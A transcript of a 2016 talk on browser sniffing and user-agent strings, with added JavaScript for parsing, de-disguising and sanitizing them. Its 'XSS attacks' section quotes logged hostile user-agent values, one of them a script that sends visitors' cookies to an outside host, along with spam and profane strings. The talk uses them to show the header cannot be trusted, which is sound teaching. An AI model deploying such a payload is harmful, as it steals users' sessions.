everybody lies Niels Leenheer 30/09/2016

warning: this talk is full of lies and deception

yes… this talk is about browser sniffing

why?

browser sniffing is dirty

you should use feature detection

Dear Web Developers: Browser Sniffing is Stupid http://www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

5 Reasons Why Browser Sniffing Stinks https://www.sitepoint.com/why-browser-sniffing-stinks/

Browser Detection is Bad https://css-tricks.com/browser-detection-is-bad/

best practices: responsive design, progressive enhancement, feature detection

antipattern: browser sniffing

browser sniffing is just a tool

everybody uses browser sniffing

what… is browser sniffing actually?

the HTTP specification defines the User-Agent header; it contains a string with information about the browser

every request the browser makes to the server includes the User-Agent header

GET http://whichbrowser.net/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: whichbrowser.net

HTTP/1.1 200 OK
Date: Mon, 08 Feb 2016 10:40:28 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
ETag: "984-50cae11796432"
Accept-Ranges: bytes
Content-Length: 2436
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

you can access the exact same string using JavaScript

<script type="text/javascript">
<!--
alert(navigator.userAgent);
//-->
</script>

you can use the user-agent string to identify: the browser, the rendering engine, the operating system, the device model, and more

what… is browser sniffing good for?

knowledge

if you know the platform or browser, you can streamline the user experience

if you know your users, you can build a better site for them

if you know which browser is being used, you can work around bugs

if you know which browser is causing errors, you can fix them

privacy implications

changing your user agent string actually makes it easier to track you

anonymity by looking like everybody else

Brave does not have a user-agent string of its own

why… is browser sniffing so difficult?

things started out simple

Mosaic: Mosaic/0.9 (Mosaic = the name of the browser; 0.9 = the version of the browser)

Netscape Navigator: Mozilla/1.0 (Win3.1) (Mozilla = the code name of the browser; 1.0 = the version of the browser; Win3.1 = operating system)

but it quickly started to get complicated

Internet Explorer: Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) (Mozilla/1.0 compatible = compatible with Netscape Navigator 1.0; MSIE = the name of the browser; 1.0 = the version of the browser; Windows 95 = operating system)

Opera: Opera/8.54 (Windows 95; U; en) (Opera = the name of the browser; 8.54 = the version of the browser; Windows 95 = operating system; U = United States level encryption; en = English language)

Opera: Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 (Presto/2.2.0 = rendering engine)

Opera: Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.0 Version/10.00 (Opera = the name of the browser; 9.8 = fake version of the browser; Version/10.00 = real version of the browser)

Firefox: Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5 (rv:1.9.1 = version of the rendering engine; Gecko = the name of the rendering engine; 20090624 = build date of the rendering engine; Firefox = the name of the browser; 3.5 = version of the browser)

Firefox: Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 (the build date is no longer updated)

Firefox: Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0

and it gets worse…

Safari: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 (Version/3.2.3 = version of the browser; Safari = the name of the browser)

Chrome: Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 (Chrome = the name of the browser; 15.0.874.120 = version of the browser)

Opera: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 (OPR = the name of the browser; 31.0.1889.180 = version of the browser)

Internet Explorer: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko (rv:11.0 = version of the browser)

Edge: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 (Edge = the name of the browser; 12.10162 = version of the browser)
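The two things the slides have been building up to are that a user-agent string has a formal shape (product/version tokens and parenthesised comments, as RFC 7231 defines them) and that the browser's own token is always the last one added, behind the tokens it imitates. The code below is an added example written for this page; it is not code from the talk, nor from UAParser, WhichBrowser or any other library named later. It tokenizes a string and then names the browser by checking the most specific token first (Edge before OPR before Chrome, Version/ before the fake Opera/9.8), generalising the rule the annotated strings above illustrate one at a time. The function names, the precedence order and the Samsung rule are this example's own assumptions.

```javascript
// Added example: RFC 7231-style tokenizer plus a precedence-based identifier.
// Not the talk's code; names and rules are assumptions made for this page.

function tokenizeUserAgent(ua) {
  const tokens = [];
  let i = 0;
  const skipSpaces = () => { while (i < ua.length && ua[i] === ' ') i++; };
  const readWord = () => {
    const start = i;
    while (i < ua.length && ua[i] !== ' ' && ua[i] !== '(') i++;
    return ua.slice(start, i);
  };
  while (true) {
    skipSpaces();
    if (i >= ua.length) break;
    if (ua[i] === '(') {
      // A comment runs to its matching ')'; nesting is legal,
      // e.g. "(PSP (PlayStation Portable); 2.60)".
      const start = i;
      let depth = 0;
      while (i < ua.length) {
        if (ua[i] === '(') depth++;
        else if (ua[i] === ')' && --depth === 0) { i++; break; }
        i++;
      }
      // Tolerate a string that ends before the ')' is closed.
      const body = depth === 0 ? ua.slice(start + 1, i - 1) : ua.slice(start + 1);
      tokens.push({ type: 'comment', parts: body.split(';').map(s => s.trim()).filter(Boolean) });
      continue;
    }
    const word = readWord();
    const slash = word.indexOf('/');
    let name = word, version = null;
    if (slash >= 0) {
      name = word.slice(0, slash);
      version = word.slice(slash + 1);
      if (version === '') {
        // Samsung Internet writes "Chrome/ 28.0.1500.94": the version is the next word.
        skipSpaces();
        if (/^\d/.test(ua.slice(i))) version = readWord();
      }
    }
    tokens.push({ type: 'product', name, version });
  }
  return tokens;
}

function identifyBrowser(ua) {
  const products = new Map();
  const comments = [];
  for (const t of tokenizeUserAgent(ua)) {
    if (t.type === 'product' && !products.has(t.name)) products.set(t.name, t.version);
    if (t.type === 'comment') comments.push(...t.parts);
  }
  const has = (n) => products.has(n);
  const ver = (n) => products.get(n);
  // Each browser appends its own token after the ones it imitates,
  // so the most specific token has to be checked first.
  if (has('Edge')) return { name: 'Edge', version: ver('Edge') };
  if (has('OPR')) return { name: 'Opera', version: ver('OPR') };
  if (has('Version') && comments.some(p => p.startsWith('SAMSUNG'))) {
    return { name: 'Samsung Internet', version: ver('Version') }; // assumed rule
  }
  if (has('Chrome')) return { name: 'Chrome', version: ver('Chrome') };
  if (has('Firefox')) return { name: 'Firefox', version: ver('Firefox') };
  // Presto-era Opera: Version/ carries the real number, Opera/9.8 is fake.
  if (has('Opera')) return { name: 'Opera', version: ver('Version') || ver('Opera') };
  if (has('Safari') && has('Version')) return { name: 'Safari', version: ver('Version') };
  const msie = comments.find(p => p.startsWith('MSIE '));
  if (msie) return { name: 'Internet Explorer', version: msie.slice('MSIE '.length) };
  const rv = comments.find(p => p.startsWith('rv:'));
  if (rv && comments.some(p => p.startsWith('Trident/'))) {
    return { name: 'Internet Explorer', version: rv.slice(3) }; // IE 11 dropped "MSIE"
  }
  return { name: 'unknown', version: null };
}

// Constructed sample input: strings copied from the slides above.
const SAMPLE_USER_AGENTS = [
  'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0',
  'Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.0 Version/10.00',
  'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3',
  'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162',
  'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko',
  'Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36',
];
for (const ua of SAMPLE_USER_AGENTS) console.log(identifyBrowser(ua), ua);
```

The order of the checks is the whole trick: swap Chrome above Edge and every Edge user becomes a Chrome user, which is exactly what happened to sites that sniffed for "Chrome" when Edge 12 shipped. Note that this only classifies what the string claims; the next slides show why the claim itself needs a second look.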

and those were all relatively normal user-agent strings

“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings

sometimes browsers simply do not make sense at all

Samsung Internet: Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 (SAMSUNG GT-I9505 = Samsung device; Version/1.5 = version of the browser)

Nokia Xpress for Windows Phone: Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5

LG Netcast: Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+

sometimes browsers lie to hide their true identity

Opera: Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 (Opera = the name of the browser; Linux = the name of the operating system; Version/11.50 = version of the browser)

Opera Mobile (desktop mode): Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 (Opera = the name of the browser; zbov = ROT13 of “mobi”; Version/11.50 = version of the browser)

Internet Explorer: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) (MSIE 8.0 = browser version)

Internet Explorer (compatibility view): Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) (Trident/5.0: Trident 5 means it’s Internet Explorer 9)
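Both disguises on the last slides can be undone from the string itself: the Trident token is the layout engine and is not rewritten by compatibility view, so it gives the real Internet Explorer version, and Opera Mobile's "zbov" is simply ROT13 of "mobi". The snippet below is an added example for this page, not the talk's code; the Trident-to-IE table (Trident/4.0 = IE 8, 5.0 = IE 9, 6.0 = IE 10, 7.0 = IE 11) is the publicly documented mapping, and the function names are assumptions.

```javascript
// Added example: undo two known user-agent disguises. Not code from the talk;
// function names are assumptions, the Trident table is the documented mapping.

// Layout-engine version → real Internet Explorer version. Compatibility view
// lowers the "MSIE x.y" number but leaves the Trident token alone.
const TRIDENT_TO_IE = { '4.0': '8.0', '5.0': '9.0', '6.0': '10.0', '7.0': '11.0' };

function realInternetExplorerVersion(ua) {
  const msie = /MSIE (\d+\.\d+)/.exec(ua);
  const trident = /Trident\/(\d+\.\d+)/.exec(ua);
  if (!msie && !trident) return null;            // not Internet Explorer at all
  const claimed = msie ? msie[1] : null;         // what the string says
  const fromEngine = trident ? TRIDENT_TO_IE[trident[1]] : null; // what the engine says
  const compatibilityView = Boolean(fromEngine && claimed && fromEngine !== claimed);
  return { version: fromEngine || claimed || null, claimed, compatibilityView };
}

function rot13(s) {
  return s.replace(/[a-z]/gi, c => {
    const base = c <= 'Z' ? 65 : 97;
    return String.fromCharCode((c.charCodeAt(0) - base + 13) % 26 + base);
  });
}

// Opera Mobile in desktop mode hides "mobi" as "zbov" inside the platform
// comment; decoding every comment part reveals it.
function operaMobileDesktopMode(ua) {
  const m = /^Opera\/[\d.]+ \(([^)]*)\)/.exec(ua);
  if (!m) return false;
  return m[1].split(';').some(part => rot13(part.trim()).toLowerCase().includes('mobi'));
}

// Constructed sample input: the strings from the slides above.
console.log(realInternetExplorerVersion('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)'));
console.log(operaMobileDesktopMode('Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50'));
```

The point for anyone writing detection rules: when two fields in a string disagree, prefer the one the vendor had no reason to fake. The engine token is there for the engine's own benefit, the "MSIE 8.0" is there for the site's.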

browsers can change the user-agent strings for individual websites

Mobile Internet Explorer 11 on Windows Phone 8.1, on html5test.com: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; ARM; Touch; WPDesktop; Lumia 535)

Mobile Internet Explorer 11 on Windows Phone 8.1: Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 535) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537

sometimes browsers are just weird


Vehicle Center Console: Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) NetFront/3.1 MMP/2.0

Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1

Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)

Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1

Mozilla/4.0 (PSP (PlayStation Portable); 2.60)

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2

? Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] Opera Bork-edition?

BORK BORK BORK

and it is possible to change the user-agent string yourself

spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)

XSS attacks

<script>alert("My Little Pony");</script>
<script language="JavaScript">document.location="http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script>
<img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony">


funny people:
(╯°□°)╯︵ ┻━┻
Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko)



angry people:
FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0
Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62
Seriously, Go fuck yourself
W3C standards are important. Stop fucking obsessing over user-agent already.

in 1.000.000 unique user-agent strings: 108 x sex, 82 x fuck, 10 x shit, 9 x dick, 6 x ass, 4 x balls, 3 x vagina

user-agent strings cannot be trusted!
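The spam, XSS and abusive strings above all arrive through the same header, and the XSS ones only work because some log viewer or analytics page echoes the header into HTML unescaped. The snippet below is an added example for this page, not the talk's code: it treats the User-Agent value as untrusted input before display (strip control characters, bound the length, HTML-escape) and flags strings that look like markup injection so they can be alerted on rather than rendered. The length limit, the heuristic and the function names are assumptions.

```javascript
// Added example: handle the User-Agent header as untrusted input before it
// reaches a log viewer or analytics page. Not code from the talk; the limit,
// the heuristic and the names are this example's assumptions.

const MAX_UA_LENGTH = 512; // assumption: generous for real strings, bounds log growth

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

function sanitizeUserAgentForDisplay(ua) {
  // 1. Drop control characters: a CR/LF inside a logged header forges extra log lines.
  let clean = ua.replace(/[\x00-\x1f\x7f]/g, '');
  // 2. Bound the length so one client cannot bloat storage or a report page.
  if (clean.length > MAX_UA_LENGTH) clean = clean.slice(0, MAX_UA_LENGTH) + '…';
  // 3. Escape for an HTML context; the browser then shows markup as text.
  return escapeHtml(clean);
}

// Cheap detection heuristic for the monitoring side: tags, event handlers,
// javascript: URLs. Real strings contain none of these.
function looksLikeMarkupInjection(ua) {
  return /<[a-z!\/]|javascript:|\bon[a-z]+\s*=/i.test(ua);
}

// Constructed sample input, modelled on the payload and a normal string from the slides.
const HOSTILE_UA = '<script>alert("My Little Pony");</script>';
const NORMAL_UA = 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0';

for (const ua of [HOSTILE_UA, NORMAL_UA]) {
  console.log(looksLikeMarkupInjection(ua) ? 'FLAGGED' : 'ok', sanitizeUserAgentForDisplay(ua));
}
```

Escaping at the point of output is the fix; the heuristic is only there to make the attempts visible in monitoring, since a string that contains a script tag is never a browser and is worth a look regardless of whether it would have rendered.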

everybody lies

you should never use browser sniffing for controlling access to your website

you should never use browser sniffing for determining browser capabilities

you should never build your own browser sniffing library

#1 use a browser sniffing library that is regularly updated

#2 check if it is possible to automatically schedule updates

try libraries like UAParser, PiwikDeviceDetector or WhichBrowser:
https://github.com/ua-parser
https://github.com/piwik/device-detector
https://github.com/whichbrowser

http://useragent.mkf.solutions https://github.com/ThaDafinser/UserAgentParserComparison

“If you tell a big enough lie and tell it frequently enough, it will be believed” — Ghandi


“If you tell a big enough lie and tell it frequently enough, it will be believed” — Adolf Hitler

thank you!
